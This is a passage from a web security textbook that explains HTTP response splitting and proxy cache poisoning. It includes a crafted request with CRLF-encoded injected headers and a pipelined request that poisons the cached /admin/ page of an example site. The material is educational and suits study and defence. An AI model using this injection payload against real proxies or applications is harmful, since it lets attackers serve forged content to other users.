The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

HTTP/1.1 200 OK

Set-Cookie: UserId=123

Content-Length: 22

foo

HTTP/1.1 200 OK

Content-Length: 2307

...

3. The attacker opens a TCP connection to the proxy server and sends his

crafted request followed immediately by a request for the page to be

poisoned. Pipelining requests in this way is legal in the HTTP protocol:

GET http://wahh-app.com/home.php?uid=123%0d%0aContent-Length:+22%0d

%0a%0d%0a%0d%0afoo%0d%0a%0d%0aHTTP/1.1+200+OK%0d%

0aContent-Length:+2307%0d%0a%0d%0a%0d%0a%0d%0a

0d%0a[...long URL...] HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Keep-alive

GET http://wahh-app.com/admin/ HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Close

4. The proxy server opens a TCP connection to the application, and sends

the two requests pipelined in the same way.

5. The application responds to the first request with the attacker’s injected

HTTP content, which looks exactly like two separate HTTP responses.

6. The proxy server receives these two apparent responses, and interprets

the second as being the response to the attacker’s second pipelined

request, which was for the URL 

http://wahh-app/admin/

. The proxy

caches this second response as the contents of this URL. (If the proxy

has already stored a cached copy of the page, the attacker can cause it

to re-request the URL and update its cache with the new version by

inserting an appropriate 

If-Modified-Since

header into his second

request and a 

Last-Modified

header into the injected response.) 

Download 5,76 Mb.

Do'stlaringiz bilan baham: